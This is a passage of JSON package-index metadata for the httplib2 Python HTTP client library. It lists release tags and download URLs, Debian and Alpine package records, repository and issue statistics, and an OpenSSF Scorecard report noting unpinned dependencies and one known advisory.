positories/httplib2%2Fhttplib2/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"a128b94898068fb9357bb693f134c5d0a2443871","kind":"tag","published_at":"2020-01-15T22:54:53.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.16.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"095494db43abe8ddfd53b3c389baaadbfcae4f12","kind":"tag","published_at":"2019-12-19T14:34:09.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.15.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"761558788d540b9442cd1614570074c61aa0bfca","kind":"tag","published_at":"2019-09-27T04:44:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.14.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0/manifests"},{"name":"v0.13.1","sha":"d498ee35017a9498cff3e9aa9887b95b988e6ca9","kind":"tag","published_at":"2019-07-28T11:28:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1/manifests"},{"name":"v0.13.0","sha":"e92155b85c719405fefe69b045f3bcf55d4fbcc1","kind":"commit","published_at":"2019-06-06T19:40:38.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0/manifests"},{"name":"v0.12.3","sha":"dd741d17b595ef47a12f06f7db823fb85edab603","kind":"commit","published_at":"2019-04-24T05:30:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3/manifests"},{"name":"v0.12.1","sha":"ead7f8038f1cd02a923544c4f3294c1389ad3e03","kind":"commit","published_at":"2019-02-14T16:38:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1/manifests"},{"name":"v0.12.0","sha":"86c3b4ea8614cbbddd86fc556781f2f79cd7c2ac","kind":"commit","published_at":"2018-11-14T04:40:05.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0/manifests"},{"name":"v0.11.3","sha":"70fb0c820d2e8211992b402d34444e4b32a1cb6e","kind":"commit","published_at":"2018-03-30T02:21:39.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3/manifests"},{"name":"v0.11.2","sha":"470bb2a9db658b7f851522051f2b0201a21e8925","kind":"commit","published_at":"2018-03-30T02:09:45.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2/manifests"},{"name":"v0.11.1","sha":"f20cd36c44b75d9206f050304937d5f4d63f5b7a","kind":"commit","published_at":"2018-03-26T17:15:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1/manifests"},{"name":"v0.11.0","sha":"5dee729d87cecab1b6c0d7874a8bbd8d24452849","kind":"commit","published_at":"2018-03-21T18:13:04.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0/manifests"},{"name":"v0.10.3","sha":"1ae16e0e8e868e4b81225631ee37c6555493014b","kind":"commit","published_at":"2017-02-06T17:56:20.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"ef81f9566ee765b8f3d93429e3dfa17341d098e7","kind":"commit","published_at":"2017-02-03T21:09:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"4623377a073e1027a691fe139ba1e851eabf0d49","kind":"commit","published_at":"2017-02-03T19:43:17.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1/manifests"},{"name":"0.9.2","sha":"cf631a73e2f3f43897b65206127ced82382d35f5","kind":"tag","published_at":"2015-09-28T13:53:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2/manifests"},{"name":"0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"tag","published_at":"2015-09-28T13:52:59.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1/manifests"},{"name":"v0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"commit","published_at":"2015-04-11T13:50:15.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1/manifests"},{"name":"v0.9","sha":"058a1f9448d5c27c23772796f83a596caf9188e6","kind":"commit","published_at":"2014-04-15T12:53:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9/manifests"},{"name":"0.9","sha":"0197ec868a4fc638c08358b94200ffd6ddb1bf50","kind":"tag","published_at":"2014-04-14T12:50:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9/manifests"}]},"repo_metadata_updated_at":"2026-08-22T21:43:00.383Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:deb/debian/python-httplib2?arch=source\u0026distro=debian-13\u0026repository_url=https://packages.debian.org/trixie","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/debian/python-httplib2","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/debian/python-httplib2","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/debian/python-httplib2/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T12:38:31.362Z","issues_count":64,"pull_requests_count":61,"avg_time_to_close_issue":13710979.942857143,"avg_time_to_close_pull_request":12412190.204545455,"issues_closed_count":35,"pull_requests_closed_count":44,"pull_request_authors_count":42,"issue_authors_count":59,"avg_comments_per_issue":3.796875,"avg_comments_per_pull_request":2.4098360655737703,"merged_pull_requests_count":31,"bot_issues_count":0,"bot_pull_requests_count":4,"past_year_issues_count":5,"past_year_pull_requests_count":5,"past_year_avg_time_to_close_issue":520238.0,"past_year_avg_time_to_close_pull_request":596027.3333333334,"past_year_issues_closed_count":3,"past_year_pull_requests_closed_count":3,"past_year_pull_request_authors_count":5,"past_year_issue_authors_count":5,"past_year_avg_comments_per_issue":2.4,"past_year_avg_comments_per_pull_request":0.8,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":1,"past_year_merged_pull_requests_count":3,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/issues","maintainers":[{"login":"temoto","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}],"active_maintainers":[{"login":"temoto","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/debian-13/packages/python-httplib2/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/debian-13/packages/python-httplib2/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/debian-13/packages/python-httplib2/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/debian-13/packages/python-httplib2/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/debian-13/packages/python-httplib2/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/debian-13/packages/python-httplib2/codemeta","maintainers":[],"registry":{"name":"debian-13","url":"https://packages.debian.org/trixie","ecosystem":"debian","default":false,"packages_count":38024,"maintainers_count":0,"namespaces_count":4,"keywords_count":1985,"github":"debian","metadata":{"codename":"trixie","funded_packages_count":1687},"icon_url":"https://github.com/debian.png","created_at":"2026-02-04T11:01:50.448Z","updated_at":"2026-08-25T05:04:56.023Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/debian-13/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/debian-13/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/debian-13/namespaces"}},{"id":6146213,"name":"py3-httplib2","ecosystem":"alpine","description":"Python3 HTTP client library","homepage":"https://github.com/httplib2/httplib2","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/httplib2/httplib2","keywords_array":[],"namespace":"community","versions_count":1,"first_release_published_at":"2022-04-12T18:56:59.000Z","latest_release_published_at":"2022-04-12T18:56:59.000Z","latest_release_number":"0.20.4-r0","last_synced_at":"2026-03-17T02:16:17.231Z","created_at":"2023-01-31T23:04:48.916Z","updated_at":"2026-08-22T23:56:08.401Z","registry_url":"https://pkgs.alpinelinux.org/package/v3.16/community/x86_64/py3-httplib2","install_command":"apk add py3-httplib2","documentation_url":null,"metadata":{"repository":"community","architecture":"x86_64"},"repo_metadata":{"id":5379896,"uuid":"53002916","full_name":"httplib2/httplib2","owner":"httplib2","description":"Small, fast HTTP client library for Python. Features persistent connections, cache, and Google App Engine support. Originally written by Joe Gregorio, now supported by community.","archived":false,"fork":false,"pushed_at":"2026-06-26T10:10:15.000Z","size":3934,"stargazers_count":512,"open_issues_count":63,"forks_count":189,"subscribers_count":22,"default_branch":"master","last_synced_at":"2026-08-21T12:21:59.455Z","etag":null,"topics":["http","http-client","network","python"],"latest_commit_sha":null,"homepage":"http://httplib2.readthedocs.io/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/httplib2.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG","contributing":"contributing.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2016-03-02T22:59:52.000Z","updated_at":"2026-08-19T07:11:22.000Z","dependencies_parsed_at":"2024-06-18T12:23:46.605Z","dependency_job_id":"dbfee945-96d9-41e9-8932-65c2aca77af6","html_url":"https://github.com/httplib2/httplib2","commit_stats":{"total_commits":538,"total_committers":73,"mean_commits":7.36986301369863,"dds":0.6561338289962826,"last_synced_commit":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7"},"previous_names":[],"tags_count":43,"template":false,"template_full_name":null,"purl":"pkg:github/httplib2/httplib2","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/sbom","scorecard":{"id":471277,"data":{"date":"2025-08-11","repo":{"name":"github.com/httplib2/httplib2","commit":"1a6ff781792099e9e14d7beb610bd99112b17b07"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.4,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":3,"reason":"Found 10/27 approved changesets -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Maintained","score":1,"reason":"2 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/publish.yaml:1","Warn: no topLevel permission defined: .github/workflows/style.yaml:1","Warn: no topLevel permission defined: .github/workflows/test.yaml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:69: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:75: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:99: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:113: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:58: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: pipCommand not pinned by hash: script/test:28","Warn: pipCommand not pinned by hash: script/test:36","Warn: pipCommand not pinned by hash: script/test:42","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:112","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:35","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:74","Warn: pipCommand not pinned by hash: .github/workflows/style.yaml:26","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:42","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:44","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:69","Info:   0 out of  16 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of  11 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: OSSFuzz integration found","Info: PythonAtherisFuzzer integration found: tests/fuzz_request.py:2","Info: PythonAtherisFuzzer integration found: tests/fuzz_url.py:2"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":9,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Warn: project license file does not contain an FSF or OSI license."],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-79v4-65xg-pq4g"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 16 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T13:56:43.862Z","repository_id":5379896,"created_at":"2025-08-19T13:56:43.862Z","updated_at":"2025-08-19T13:56:43.862Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36802710,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-21T02:00:06.756Z","response_time":57,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"httplib2","name":"httplib2","uuid":"17128733","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/17128733?v=4","repositories_count":1,"last_synced_at":"2024-03-25T18:41:02.027Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/httplib2","funding_links":[],"total_stars":482,"followers":7,"following":0,"created_at":"2022-11-02T16:22:04.713Z","updated_at":"2024-03-25T18:41:02.043Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/ow